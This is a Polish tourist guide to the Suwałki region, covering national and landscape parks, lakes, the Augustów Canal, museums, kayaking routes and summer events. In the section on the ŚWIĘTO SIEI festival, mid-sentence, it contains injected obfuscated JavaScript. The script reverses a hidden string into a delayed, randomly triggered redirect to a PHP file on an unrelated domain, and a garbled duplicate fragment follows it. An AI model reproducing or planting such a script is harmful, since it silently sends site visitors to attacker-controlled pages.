Atrakcje turystyczne na Suwalszczyźnie

Co warto zwiedzić i zobaczyć na Suwalszczyźnie ?

WIGIERSKI PARK NARODOWY zobacz

SUWALSKI PARK KRAJOBRAZOWY zobacz

MUZEUM OKRĘGOWE I MUZEUM IM. MARII KONOPNICKIEJ w Suwałkach w muzeum można obejrzeć wystawę poświęconą między innymi historii Suwałk a także wystawę poświęconą polskiemu malarzowi Alfredowi Wieruszowi Kowalskiemu, który był związany z Suwałkami. Właśnie w tym domu urodziła się znana polska poetka, nowelistka, pisarka i tłumaczka Maria Konopnicka.

SZELMENT – w centrum Suwalszczyzny na górze Leszczynowej mieści się ośrodek – „WOSiR Szelment”. To nowoczesny kompleks sportowo-rekreacyjny znajduje się on zaledwie 15 km od Suwałk, na pograniczu gmin Jeleniewo i Szypliszki bezpośrednio nad jeziorem Szelment Wielki na Górze Jesionowej, która w latach międzywojennych służyła do startów szybowców. Polodowcowa rzeźba tego terenu oraz srogie i białe zimy, trwające od listopada do kwietnia spowodowały, że sezon narciarski na „polskim biegunie zimna” jest wydłużony. Jest tam także naturalne lodowisko dla łyżwiarzy w porze zimowej, natomiast w sezonie letnim park linowy oraz wyciąg nart wodnych.
Obiekt oferuje noclegi oraz restaurację serwującą dania kuchni regionalnej Suwalszczyzny. Mieści się tu także wypożyczalnia sprzętu wodnego i narciarskiego. Miejsce jest rajem dla osób preferujących aktywną formę wypoczynku.

BAZYLIKA W SEJNACH – Sejny są położone 30 km od Suwałk nad rzeką Marychą. Tam wybudowano bazylikę pw. Nawiedzenia Najświętszej Maryi Panny a w niej rzeźbę Matki Boskiej Sejneńskiej słynącej z łask. W Sejnach warto zwiedzić Podominikański Klasztor, dawny Pałac biskupi z XIX wieku i ratusz z epoki klasycyzmu, dawną synagogę (obecnie galeria), neogotycki kościół pw. Matki Boskiej Częstochowskiej.  W Sejnach działa Ośrodek Pogranicze – Sztuk, Kultur i Narodów, który organizuje różne koncerty i wystawy. Co roku pod koniec lipca w Bazylice  odbywa się Międzynarodowy Festiwal Organowy Młodych JUNIORES PRIORES.

DWÓR MIŁOSZA W KRASNOGRUDZIE – miejscowość mieści się nad jeziorem Hołny, ale w pobliżu znajduje się także jezioro Gaładuś, które warto  dookoła objechać rowerem. To drugie pod względem wielkości jezioro Suwalszczyzny.
Pokaźny modrzewiowy dworek tonie w odcieniach zieleni. Wokół dworku rozciąga się park, który schodzi ku obszernemu jezioru Hołny. Jezioro jest zasobne w dużą ilość ryb. Wokół ptactwo i dzika zwierzyna. To Krasnogruda. Miejscowość położona tuż przy polsko-litewskiej granicy. Miejsce, którym w dzieciństwie rozkoszował się Czesław Miłosz. Dzisiaj Krasnogruda przyjmuje wielu turystów i gości. Tutaj prowadzone są odczyty, warsztaty oraz spotkania poetyckie.

DOM KULTURY LITEWSKIEJ W PUŃSKU – MUZEUM ETNOGRAFICZNE – Puńsk nazywany jest stolicą polskich Litwinów, którzy głownie zamieszkują teren Puńska i jego okolic. Działający od 1956 r. Dom Kultury Litewskiej jest centrum kulturowym, wokół którego skupione są zespoły pieśni i tańca w regionie.  W ciągu roku odbywa się około 50 imprez kulturowych. W samym DKL odbywa się bardzo dużo wydarzeń kulturalnych. W domu kultury litewskiej kultywuje się język litewski, tradycje litewskie i obyczaje. Przy DKL działa zespół choreograficzny „Jotva”, chór „Dzūkija”, kapela „Klumpė” i zespół taneczny „Vyčiai” i teatr stodolany. W domu kultury litewskiej mieści się muzeum Etnograficzne, w którym są przedstawione eksponaty związane z uprawą rzemiosła, roli i gospodarstwem domowym. W Puńsku możemy udać się do restauracji, w której dominują typowo litewskie dania (kartacze, bliny litewskie, kiszka ziemniaczana).

BAŚNIOWY SZLAK – biegnie doliną Czarnej Hańczy Rospudy i Szeszupy.  Szlak turystyczno krajoznawczy „Podróż do Etnobajki”.
(Baśniowy Szlak) został nominowany w Konkursie Polska Pięknieje 2015, w kategorii „Miejsce przyjazne rodzinie”. Jest to siedem przystanków w Wioskach Bajek – ciekawie zagospodarowanych miejscach zabawy, wypoczynku i rekreacji. Każdy z nich ma swojego własnego krasnala, który jest przewodnikiem i oddzielną tematykę, która jest związana z legendami, utworami Marii Konopnickiej, baśniami.  Szlak składa się z siedmiu wiosek tematycznych:
1.    Zaułek Krasnoludków przy Muzeum Marii Konopnickiej w Suwałkach
2.    Wioska Wesołych Wędrowców przy Ośrodku Maniówka w Nowej Wsi. W Maniówce znajduje się również najwyższy termometr tradycyjny na świecie.
3.    Wioska Dwóch mistrzów w Puńsku
4.    Dolina Przygód nad Szeszupą w Rutce Tartak
5.    Wioska Zapomnianych Wojów w Bakałarzewie
6.    Wioska Darów Lasu w Kopcu
7.    Miasteczko Sekretnych Uliczek w Sejnach
Jest to niezwykła frajda dla ciekawych świata maluchów oraz edukacja poprzez zabawę.

WIADUKTY W STAŃCZYKACH
Mazury to magiczny zakątek kraju. Właśnie tu wśród malowniczych lasów, pagórków i łąk, za wsią Stańczyki, znajdują się wiadukty nieaktywnej trasy linii kolejowej Gołdap – Żytkiejmy (31km). Mosty w Stańczykach są najwyższymi mostami kolejowymi i jednymi z najwyższych w Polsce o konstrukcji z żelbetu i licznych łukach. Długość – 200m i wysokość 36m. Architektura danego obiektu charakteryzuje się dokładnymi proporcjami a filary ozdobione są elementami wzorowanymi na rzymskich akweduktach w Pont du Gard (nazwa pochodzi z j. francuskiego). Znane są również pod nazwą akwedukty Puszczy Rominckiej. Dane miejsce budzi wiele emocji wśród zwiedzających, jest ono spektakularne i nietypowe z niesamowitym widokiem z ogromnej wysokości.
Na mostach organizowane wcześniej były skoki na linach oraz bungy jumping. Pod mostami płynie strumyk rzeczny, jest tam mnóstwo kamieni i bezpośrednie zejście nad wodę drewnianymi schodami, bilety wstępu są stosunkowo niedrogie a mosty są po generalnym remoncie. Będąc w Stańczykach warto również obejrzeć mosty w Kiepojciach, Botkunach koło Gołdapi.

ŚWIĘTE MIEJSCE – UROCZYSKO (ŚWIĘTE MIEJSCE) to urokliwe miejsce nad Rospudą, płynie tam rzeka Jałówka i jezioro Jagłowe. Miejsce to jest nazywane świętym, dlatego, że historia tego miejsca ma powiązanie z cudami, objawieniem się Najświętszej Marii Panny.
Każdego roku katolicy z okolic zbierają się w tym miejscu, aby pomodlić się. Modlitwa odbywa się corocznie w dniu 24 czerwca.
Mieści się tu kapliczka z 1990 r., drewniany świątek oraz kamienne i drewniane krzyże.
Jeden z tych krzyży postawiony został przez Jaćwingów po przyjęciu przez nich chrztu w 1283r.
Jest to ciche miejsce, ideale na spacery i bardzo urokliwe, można tam doskonale wypocząć na łonie natury i zorganizować spływ kajakowy oraz piknik dla całej rodziny.
SCHRONY BOJOWE Z CZASÓW II WOJNY ŚWIATOWEJ- schrony wchodzą w skład ufortyfikowanej poniemieckiej linii obronnej z czasów II Wojny światowej. Jest to część szlaku Fortyfikacji Pozycji Granicznej. W Raczkach znajduje się 9 zachowanych schronów, 13 w Bakałarzewie oraz 3 w Filipowie. W Bakałarzewie mieści się Skansen Fortyfikacji Prus Wschodnich.

PAŁAC PACA W DOWSPUDZIE – jest to pozostałość po dwukondygnacyjnym neogotyckim pałacu, który został wybudowany w latach 820-1827, dzięki staraniom Ludwika Michała Paca.
Ludwik Michał Pac był generałem Wojsk napoleońskich i polskich. Pałac zaprojektowali znani architekci P. Bosio oraz H.Marconi. Niestety zachował się do tej pory tylko arkadowy portyk i wieżyczka.
W odrestaurowanym jednym z obiektów można przyjrzeć się makiecie tego niezwykłego pałacu oraz zasięgnąć wiadomości odnośnie postawy i działalności Ludwika Michała Paca.

FORTYFIKACJE NAD DOWSPUDĄ –  jest to zespół 13 schronów wybudowanych przez Niemców podczas II Wojny Światowej jako wzmocnienie dawnej granicy z Prusami.
Schron został wybudowany przez jednostki inżynieryjne Wermachtu. W Bakałarzewie w muzeum można przyjrzeć się bunkrowi i ekspozycji muzealnej z autentycznymi przedmiotami z okresu II Wojny Światowej i dostać się na wieżę widokowo-fortyfikacyjną. Miejsce godne polecenia dla miłośników historii.

KANAŁ AUGUSTOWSKI – jeden z najciekawszych szlaków wodnych w województwie podlaskim. Został wybudowany w latach 1823- 1839 wg projektu generała Ignacego Prądzyńskiego. Mierzy sobie 80 km po stronie polskiej oraz 23 km na Białorusi. Już niebawem będzie możliwość w Rudawce przekroczenia granicy bezwizowo, tylko z paszportem drogą wodną bądź rowerem z przystankiem po stronie białoruskiej do 72 godzin.
Na kanale znajduje się 18 śluz (jedna graniczna, 3 po stornie białoruskiej, 14 po stronie polskiej).
Kanał Augustowski włączony został w Europejski Szlak Tematyczny – Transport i Komunikacja, będący częścią Europejskiego Szlaku Dziedzictwa Przemysłowego.
Śluzy mają swoje nazwy własne:  Dębowo, Sosnowo, Borki, Białobrzegi, Augustów, Przewięź, Swoboda, Gorczyca, Paniewo (jedyna dwukomorowa śluza na Kanale Augustowskim), Perkuć,  Mikaszówka,  Sosnówek, Tartak,  Kudrynki,  Kurzyniec, Wołkuszek, Dąbrówka i  Niemnowo tam gdzie już dobiega końca kanał Augustowski. Śluzy i Kanał Augustowski możemy podziwiać podczas rejsów statkiem z Augustowa i podczas spływów kajakowe rzeką Czarną Hańczą.  Wzdłuż Kanału Augustowskiego biegnie również szlak rowerowy Green Velo, czarny szlak i czerwony – Podlaski Szlak Bociani.

STUDZIENICZNA – miejscowość jest ściśle powiązana z religią katolicką, kultem maryjnym, studnią z uzdrawiającą wodą. Wybudowano tam kaplicę Najświętszej Marii Panny oraz drewniany kościół ze zdobieniami z poroża. Miejsce to odwiedził również papież Jan Paweł II.

OSADA JAĆWIESKO – PRUSKA W OSZKINIACH – jest to kamienno- drewniany kompleks ukazujący dawny gród Jaćwingów – Bałtów.
Właśnie tam Prusowie i Jaćwingowie odbywali rytuały i obrzędy.
Można przenieść się w dawne czasy i dowiedzieć się na temat życia tych plemion.

BOLCIE – Trójstyk Granic Wisztyniec. W tej miejscowości znajduje się trójstyk granic: polskiej, litewskiej i rosyjskiej.
Linię graniczną wyznaczył sam Józef Stalin. Podzielił w ten oto sposób Prusy pomiędzy Państwa. Jest to miejsce niedaleko Wiżajn nazywanych polskim biegunem zimna.

SPŁYWY KAJAKOWE – Będąc na Suwalszczyźnie warto wybrać się na spływ kajakowy rzekami: rzeką Czarną Hańczą przez Kanał Augustowski, spływ Marychą, spływ Rospudą lub spływ rzeką Szeszupą.
Organizowane są spływy kajakowe dla miłośników przyrody i turystów, których pasją jest woda. Wszystkie informacje można znaleźć na stronie organizatora spływów Wigry24

SZLAK ROWEROWY GREEN VELOKRÓLESTWO ROWEROWE SUWALSZCZYZNY I PUSZCZY AUGUSTOWSKIEJ zobacz 

Mapa atrakcji turystycznych na Suwalszczyźnie – pobierz

mapa_atrakcje_suwalszczyzny

 

 

Wigierski Park Narodowy

WIGIERSKI PARK NARODOWY to jeden z największych parków narodowych w Polsce.  Najcenniejszymi elementami przyrodniczymi parku są ekosystemy wodne, a wśród nich największe Jezioro Wigry oraz najdłuższa rzeka i jedna z najpopularniejszych tras kajakowych Czarna Hańcza. Rozległe obszary leśne, na których dominują sosny i świerki, przedstawiają typ lasu charakterystycznego dla Puszczy Augustowskiej.

Atrakcje, które warto zobaczyć i skorzystać w Wigierskim Parku Narodowym:

Muzeum Wigier w Starym Folwarku – w tym muzealnym budynku, gdzie dawniej mieściła się stacja hydrobiologiczna jest prezentowanych wiele multimediów, które umożliwiają poznanie jeziora Wigry i okolic.
Można obejrzeć wystawę, która streści działalność stacji, jest dostępne obejrzenie sali laboratoryjnej tzw. awiwarium, można zajrzeć także w głąb lodowca i zapoznać się z  przyrodą Wigierskiego Parku Narodowego.
Jest to nietypowy obiekt, który z pewnością zainteresuje geografów, geologów, archeologów oraz przyrodników.

Rejsy łodzią „LEPTODORA” – jest to motorowa łódź, która zabiera swoich pasażerów na wycieczki przyrodnicze i edukacyjne po wodnych ścieżkach jeziora Wigry. Jest to niebywała atrakcja Muzeum Wigier w Starym Folwarku. Szklane okna umieszczone w podłożu łodzi umożliwiają nam obserwację żyjątek wodnych oraz roślinności Wigier.

SIEĆ ŚCIEŻEK EDUKACYJNYCH WIGIERSKIEGO PARKU NARODOWEGO – leśne przechadzki po Wigierskim Parku Narodowym są bardzo lubiane przez turystów pieszych oraz rowerzystów. Każda ścieżka inaczej się nazywa: „Płazy”, „Suchary”, „Las”, „Jeziora”, „Puszcza”, „Samle”. Na każdej ścieżce jest tablica oraz kładki i punkty widokowe ścieżek. Łączą się one ze szlakami turystycznymi wiodąc przez najbardziej godne uwagi tereny Parku.

KLASZTOR W WIGRACH – pokamedulski zespół klasztorny w Wigrach na półwyspie otoczonym przez jezioro Wigry stanowi dzisiaj najbardziej popularne miejsce na Suwalszczyźnie i to miejsce tworzy niepowtarzalny klimat.
Jest to bardzo ciche miejsce skłaniające ku refleksjom.

REJSY STATKIEM STATKIEM PAPIESKIM TRYTON – Rejsy statkiem „TRYTON” po jeziorze Wigry położonym na Suwalszczyźnie odbywają się od maja do września każdego roku.  Statek pływa trasą papieską, czyli szlakiem wodnym, którym w 1999 roku płynął podczas swojej pielgrzymki papież Jan Paweł II.
Trasa rejsu przebiega przez Zatokę Hańczańską, w której zaobserwować można Kormorany i Czaplę. Zatrzymujemy się również na Płosie na głębokości 73m – najgłębszym miejscu na Wigrach. Począwszy od Jana Pawła II na pokładzie statku gościliśmy wiele znanych osobistości, które zachwycone były dziką przyrodą otaczającą jezioro Wigry. Podczas rejsów wieczornych można podziwiać podświetlany Klasztor Kamedułów wraz z jego wieżą widokową oraz przyległymi obiektami. Główna przystań znajduje się pod Klasztorem Kamedułów w Wigrach.

SPŁYW KAJAKOWY CZARNA HAŃCZA – Rzeka Czarna Hańcza to jeden z najpiękniejszych szlaków kajakowych w Polsce a na pewno Suwalszczyźnie. Warto się o tym przekonać i wybrać się na spływ wielodniowe a jeżeli mamy mniej czasu to warto przepłynąć wybierając jeden z kilku etapów oferowanych spływów jednodniowych: I wariant: Stary Folwark, Wigry – Maćkowa Ruda, Wysoki Most, II wariant Wysoki Most – Głęboki Bród/Frącki, III wariant: Frącki – Rygol, Mikaszówka.  I i II wariant są to spływy przez Wigierski Park Narodowy. Jest to Papieski Szlak Kajakowym, którym kiedyś pływał Karol Wojtyła. Spływ kajakowy Czarną Hańczą jest obowiązkową atrakcją i formą spędzania wakacji na Suwalszczyźnie. Oferta Spływy Czarną Hańczą

SZLAKI PISZE I ROWEROWE – Mapa Wigierskiego Parku Narodowego – pobierz

mapa_wigierski_park_narodowy

Suwalski Park Krajobrazowy

Suwalski Park Krajobrazowy jest najstarszym parkiem krajobrazowym w Polsce.  Obejmuje 4 rezerwaty. W jego centralnej części znajduje się 25 jezior. Na jego terenie znajduje się najgłębsze w Polsce jezioro Hańcza. Silnie przekształcona jest szata roślinna Parku. Najpiękniejszą atrakcją wodną jest dolina Czarnej Hańczy.
Podczas przemieszczania się rowerem możesz bez problemu zatrzymać się w każdym wybranym przez siebie miejscu żeby przyjrzeć się danemu obiektowi bądź poobcować z przyrodą i cieszyć się odkrywaniem nieznanych Ci dotąd zakątków Suwalszczyzny.

Atrakcje turystyczne w Suwalskim Parku Krajobrazowym, które warto zobaczyć:

JEZIORO JACZNO –  jezioro na Pojezierzu Suwalskim w gminie Wiżajny.
Wokół jeziora prowadzi siedmiokilometrowy szlak turystyczny. Trasa rozpoczyna się i kończy we wsi Smolniki. Po drodze można zatrzymać się i podziwiać widoki z punktów widokowych ”U Pana Tadeusza” i punkt widokowy za wsią Smolniki z widokiem na jezioro Jaczno. Ze szlaku można podziwiać krajobrazy Suwalskiego Parku Krajobrazowego, znane ze scen filmów m.in. „Pan Tadeusz”.

GÓRA CISOWA – suwalska tzw. „ Fudżijama”.  Góra ma wysokość 256 metrów i jest to morenowe wzniesienie w części wschodniej Suwalskiego Parku Krajobrazowego. Niegdyś rosło tam ogromne drzewo zwane cisem, stąd też nazwa Góra Cisowa.  Górę Cisową  otaczają cztery jeziora. Jest to punkt widokowy z panoramą na zagłębienie Szeszupy.  Panorama, która rozpościera się ze szczytu Góry Cisowej jest jedną z najpiękniejszych i najciekawszych na Suwalszczyźnie. Widać stąd nawet kilkanaście jezior. Podziwiając panoramę można zobaczyć w kierunku północno – zachodnim jeziora: Udziejek, Gubin i Okrągłe, wieś Udziejek oraz kompleks zalesionych wzgórz, w kierunku północno – wschodnim widoczna jest leżąca u stóp góry wieś Gulbieniszki, jezioro Sumowo i leśne wzgórza ciągnące się aż po Rutkę Tartak, w kierunku południowo-wschodnim malownicze, bezleśne wzgórza morenowe.
Warto wspomnieć, że na szczycie góry znajduje się krzyż oraz tablica upamiętniająca pielgrzymkę Ojca Świętego Jana Pawła II do Polski.

SMOLNIKISmolniki to osada wiejska, która jest położona nieopodal granicy z Litwą, należy do Suwalskiego Parku Krajobrazowego. Z wieży widokowej można podziwiać krajobraz trzech jezior kleszczowieckich: Perty, Kojle, Purwin oraz górę Cisową. To miejsce w sezonie jest oblegane przez turystów, w kiosku można kupić pamiątki z Suwalszczyzny. Zachwycające piękno krajobrazu można podziwiać w punkcie widokowym “U Pana Tadeusza” z widoczną panoramą na Suwalski Park Krajobrazowy oraz za wsią Smolniki w stronę miejscowości Hańcza (z tego punktu jest przepiękny widok na Jezioro Jaczno.)

GÓRA ZAMKOWA – wzniesienie o wysokości 228,1 m. n.p.m., z którego rozpościera się widok na cztery jeziora: Szurpiły, Jeglówek, Jegluweczek i Kluczysko. Na zboczach góry można dostrzec zarysy trzech pierścieni wałów obronnych warownego rodu Jaćwingów. Kiedyś na tej górze składano ofiary z ludzi. Góra Zamkowa to niezwykle ciche, urokliwe i romantyczne miejsce. Góra Zamkowa stanowi naturalny punkt widokowy na zespół jezior Szurpilskich.

REZERWAT RUTKA Z PLATFORMĄ WIDOKOWĄ – Rezerwat „Rutka” to unikalne w skali krajowej głazowisko, jezioro wytopiskowe oraz kompleks wzgórz morenowych. Głazy (granity i gnejsy) rozrzucone są na przestrzeni 0.5 km. kw., naniesione zostały przez lodowiec skandynawski. Są one charakterystycznymi elementami polodowcowego krajobrazu Suwalszczyzny Kamienie leżą niemal w całości na powierzchni gruntu. Rezerwat „Rutka’ jest b. rzadko spotykany pod względem krajobrazowym. Przy  głazowisku  ustawiona została platforma widokowa, skąd rozciąga się przepiękny widok na panoramę Szeszupy. Można obserwować z tamtą  wzniesienia. Krajobraz uatrakcyjnia zlokalizowane we wgłębieniu jezioro Linówek. W jeziorze występuje rak szlachetny. W obrębie jeziora rośnie 357 gatunków roślin pod ochroną i nie tylko.

JEZIORO HAŃCZA –  to najgłębsze jezioro w Polsce.  Głębokość Hańczy wynosi 108,5 m, jest jeziorem polodowcowym, rynnowym.
Przez jezioro przepływa rzeka Czarna Hańcza. Hańcza ma podłoże piaszczysto-żwirowe, jest to jezioro czyste i przejrzyste, temperatura wody ze względu na swoją głębokość jest niższa niż w innych jeziorach Suwalszczyzny.  Dno i brzegi jeziora są otoczone licznymi głazami narzutowymi, największy z nich, czyli tzw. kamień graniczny, leży na odcinku Stara Hańcza – Błaskowizna.   Można do niego trafić spacerując wschodnim szlakiem wzdłuż jeziora Hańcza(pieszy szlak niebieski), z Bachanowa do Starej Hańczy.
W wielu miejscach można podziwiać wspaniałą panoramę największego jeziora np. na platformie widokowej na Górze Leszczynowej czy we wsi Mierkinie.
Jezioro Hańcza jest wspaniałym miejscem do nurkowania, dno jeziora jest specyficzne, mnóstwo tutaj rowów, dołów, górek i stromych wąwozów. Wiele baz nurkowych ze sprzętem znajduje się we wsi Błaskowizna. Tu płetwonurkowie zaczynają swoją podwodną przygodę.
W Błaskowiźnie nad jeziorem Hańcza jest ogólnodostępna plaża z długim pomostem. Inna ogólnodostępna plaża znajduję się w Starej Hańczy.
Na jeziorze Hańcza można również wędkować. Z ryb żyjących w Hańczy warto wymienić: węgorza, stynkę, sielawę, sieję, szczupaka oraz należące do rzadkości: troć jeziorową, strzeblę potokową, głowacza białogłowego i głowacza pręgopłetwego – gatunki spotykane tylko w Hańczy.

STARA HAŃCZA –  mieści się tam park dworski i ruiny tego dworu.
Jest to dawna posiadłość szlachecka, jej pozostałości. Dwór jest usytuowany na wzniesieniu, dzięki czemu widać panoramę jeziora Hańcza, w dniu dzisiejszym możemy zauważyć tylko stare podpiwniczenie oraz pomnik przyrody z aleją z licznych drzew lipowych.

GÓRA LESZCZYNOWA – znajduje się we wsi Przełomka, jest obficie zalesiona, to strome urwisko przy samym jeziorze Hańcza. Jest to jedno z najwyższych wzniesień Suwalskiego Parku Krajobrazowego 272 m n. p. m. Punkt widokowy Góry Leszczynowej mieści się nad Jeziorem Hańcza.
Na szczycie góry znajduję się punkt widokowy, z którego dokładnie widać przeźroczystą taflę jeziora Hańcza.

MOLENNA STAROOBRZĘDOWCÓW W WODZIŁKACH – jest to drewniana świątynia staroobrzędowców, którzy są potomkami Rosjan, należą do odłamu rosyjskiego Kościoła Prawosławnego, powstałego po reformach patriarchy Nikona.
Jest to cerkiew staroprawosławna, jej wnętrze różni się od wnętrza prawosławnej cerkwi. Jest godna odwiedzenia, tamtejsze tereny zamieszkują nadal staroobrzędowcy, którzy emigrowali na Suwalszczyznę, są nazywani obrońcami starej wiary. W Suwałkach świątynia starowierców jest uczęszczana przez wyznawców tej wiary i w Gabowych Grądach również.

GŁAZOWISKO BACHANOWO I ŁOPUCHOWO – obejmuje obszar, który ukształtował się przez lądolód skandynawski, dlatego na jego obszarze leżą ogromne głazy. Utworzone są tutaj dwa rezerwaty, które są okazem, dzięki tym niepowtarzalnym głazowiskom.

TURTUL – w tej miejscowości mieściła się dawna osada młyńska, jest usytuowana na jednym z pagórków ozu turtulskiego. Z tamtą jest widok na staw tur tulski oraz spiętrzenia wód Czarnej Hańczy powstałego na potrzeby dawniej czynnego tutaj młyna wodnego.
Izba Pamięci Jaćwieskiej – izba powstała w 2014 roku, aby bardziej uwidocznić historię zamieszkującego w dawnych czasach plemienia.
Znajdują się tam repliki znalezionych w tamtejszych okolicach eksponatów, tablice opisujące historię tych terenów, historię Jaćwingów oraz z tych tablic można dowiedzieć się dużo ciekawostek archeologicznych, znajduję się tam również makieta fragment Góry Cisowej.

SKANSEN GOŚCINIEC DRUMLIN W UDZIEJKU – znajduje się on bezpośrednio w centrum Suwalskiego Parku Krajobrazowego. Jest to zagroda wiejska charakterystyczna dla XIX wieku na terenie Suwalszczyzny. Skansen robi wrażenie poprzez zachowanie detali, dachu z wiórów, elementów z gliny. Mieści się tam również stajnia. Jest to okazały obiekt, do którego po drodze warto zajechać i zajrzeć do jego wnętrza.

PARK LINOWY – TWIERDZA JAĆWINGÓW W UDZIEJKU – twierdza Jaćwingów to miejsce do aktywnego spędzania czasu na świeżym powietrzu. Nad brzegiem jeziora mieści się park linowy, składający się z czterech tras, każdy z nich ma inny stopień trudności, jest to także atrakcja przeznaczona dla młodszych turystów. Jest to atrakcyjna i nowoczesna forma spędzania czasu w sposób szczególnie aktywny i dla odważnych.

MŁYN WODNY UDZIEJKU – młyn znajduje się we wschodniej części Suwalskiego Parku Krajobrazowego, około 400 m w prawo od drogi powiatowej Gulbieniszki – Udziejek, za Górą Cisową.  Młyn stoi we wsi Udziejek, nad rzeką Szeszupą.
Młyn wybudowano na przełomie XIX i XX w. Właścicielami młyna przed II wojną światową byli przybysze z Niemiec. Historia o młynie w Udziejku jest bardzo ciekawa i warto się z nią zapoznać. Po wojnie młyn został porzucony, majątek zaś przejął Skarb Państwa. Następnie młyn został przekazany w ręce inwalidy wojennego Franciszka Przełomca.  Jest to jeden z nielicznym młynów wodnych zachowanych na Suwalszczyźnie, dzięki temu stanowi bardzo cenny przykład wiejskiego budownictwa.

SZLAKI PIESZE I ROWEROWE PO SUWALSKIM PARKU KRAJOBRAZOWYM – widoki, w których można się zakochać. Kto tu raz przyjedzie, z pewnością będzie wracał i tęsknił. Polecamy zwiedzanie Suwalskiego Parku Krajobrazowego na rowerze. Trasy są świetnie oznakowane, przebiegające w większości po szutrowych, utwardzonych drogach. Na trasach jest spokojnie i nie ma dużego ruchu rowerzystów.  Krajobraz jest niezwykle urozmaicony, pagórkowaty  i nie pod każdą górkę da się wjechać.  Ze szlaków pieszych polecamy ścieżkę poznawczą z Turtula do Bachanowa nad Jeziorem Hańcza (ok. 3km) oraz szlak niebieski pieszy od Starej Hańczy wzdłuż wschodniego brzegu jeziora do wsi Błaskowizna (na szlaku jest duży głaz – centrum Jeziora Hańcza).

SPŁYW KAJAKOWY SZESZUPĄ – spływ kajakowy rzeką w Suwalskim Parku Krajobrazowym

Imprezy turystyczne na Suwalszczyźnie

Wybrane imprezy turystyczne odbywające się na Suwalszczyźnie, które serdecznie polecamy i zapraszamy.

MISTRZOSTWA POLSKI JUNIORÓW U20 W LEKKOATLETYCE W SUWAŁKACH (1-3 lipca 2016 r.) W lipcowy weekend w Suwałkach nad Czarną Hańczą odbędą się jubileuszowe 70 Mistrzostwa Polski Juniorów U20 w Lekkoatletyce.

W trakcie 3 dni sportowych zmagań zaprezentuje się około 1200 zawodników i zawodniczek z  Polski.  Wśród nich nie zabraknie „nadziei olimpijskich”. Na suwalskim stadionie pojawią się m.in. E. Swoboda, rekordzistka Polski w biegu na 60 m (czas 7,07 s) i Mistrzyni Europy Juniorów z Eskilstuny (2015) w biegu na 100 metrów, a także K. Bukowiecki, profesjonalizuje  się w rzucie dyskiem i pchnięciu kulą, Mistrz Świata Juniorów (Eugene 2014) i Mistrz Europy Juniorów (Eskilstuna 2015).

Zapraszamy do skorzystania z oferty noclegów  podmiotów działających w naszym stowarzyszeniu. Baza noclegowa i więcej informacji o wolnych pokojach na Mistrzostwa Polski w Lekkoatletyce na podstronie „Nasza Oferta”.

BLUES FESTIVAL SUWAŁKI (7-10 lipca 2016) – wówczas Suwałki są oblegane przez imprezowiczów, turystów oraz miejscowych, którzy oczekują występów bluesowych. Na koncertach można usłyszeć muzykę na żywo, w wykonaniu znanych artystów – muzyków. Festiwal bluesowy to szereg imprez muzycznych: warsztatów instrumentalnych, pokazów sprzętu muzycznego, prezentacje wydawnictw z płytami, spotkania z muzykami oraz wykłady o muzyce blues. Na scenie już występowały takie gwiazdy muzyczne jak Bob Dylan, Mick Taylor, Canned Heat i wiele innych.

ŚWIĘTO SIEI – Jest to tzw. „Piknik rodzinny”. Święto ryby Siei odbywa się w ogrodach wigierskich przy Klasztorze nad Wigrami.  Jest to impreza turystyczna, w których skład wchodzą dyskoteki, konkursy, pokazy Straży Pożarnej, pokazy rzemiosła i kuchni tradycyjnej, degustacja zupy rybnej, stoiska h $cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“‘php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} andlowe z wyrobami regionalnymi, atrakcjami dla dzieci i wiele innych.

JARMARK WIGIERSKI, ODPUST W WIGRACH (15 sierpnia): Tradycyjne potrawy, sery, wędliny a także warsztaty garncarskie i tkackie – to tylko niektóre propozycje tradycyjnego Jarmarku Wigierskiego, który odbywa się w niedzielę podczas odpustu wigierskiego. Odpust ma miejsce, co roku w Święto katolickie Wniebowzięcia Najświętszej Marii Panny 15 sierpnia.  Temu wydarzeniu towarzyszą imprezy regionalne, pokazy, warsztaty, wystawy, degustacje, sprzedaż regionalnych wypieków oraz wędlin i serów. Całej imprezie towarzyszy oprawa muzyczna.  Tego dnia przyjeżdżają w to miejsce tłumy, ludzie z całej Polski. Również można korzystać wówczas z atrakcji wodnych oraz kąpielisk i rejsów statkiem.

MARATON WIGRY (20 sierpnia 2016) – Maraton biegowy, dzięki któremu odwiedzisz przepiękne miejsca. Trasa przeprowadzona w całości na terenie Wigierskiego Parku Narodowego, wokół Jeziora Wigry, w większości zielonym szlakiem pieszym.  Start maratonu przy Pokamedulskim Klasztorze Wigierskim, natomiast meta w Starym Folwarku gdzie jest mnóstwo kwater noclegowych. Szczególnie zapraszamy do skorzystania z pobliskich  kwater działających przy stowarzyszeniu. Więcej dostępnych noclegów na Maraton Wigry na podstronie „Nasza Oferta”

Trasa na dwóch dystansach:

  • MARATON WIGRY – ok 42 km wokół Jeziora Wigry – w znakomitej większości leśne ścieżki i drogi gruntowe, nieco asfaltu
  • POGOŃ ZA BOBREM – ok 13km – leśne ścieżki i drogi gruntowe

Kręte i wąskie ścieżki leśne nad samą linią brzegową jeziora, daleko wysunięte kładki na bagnach i szutrówki. Są to tzw. Zielone Płuca Polski.  Maraton jest też imprezą integracyjną dla dzieci i dorosłych, to wspaniała okazja do spędzenia niezapomnianego weekendu oraz doskonałego wypoczynku np. przed pracą, a także korzystanie w pełni z wymarzonej pogody i lata.  Wszelkie szczegółowe informacje można znaleźć na stronie internetowej www.maratonwigry.pl

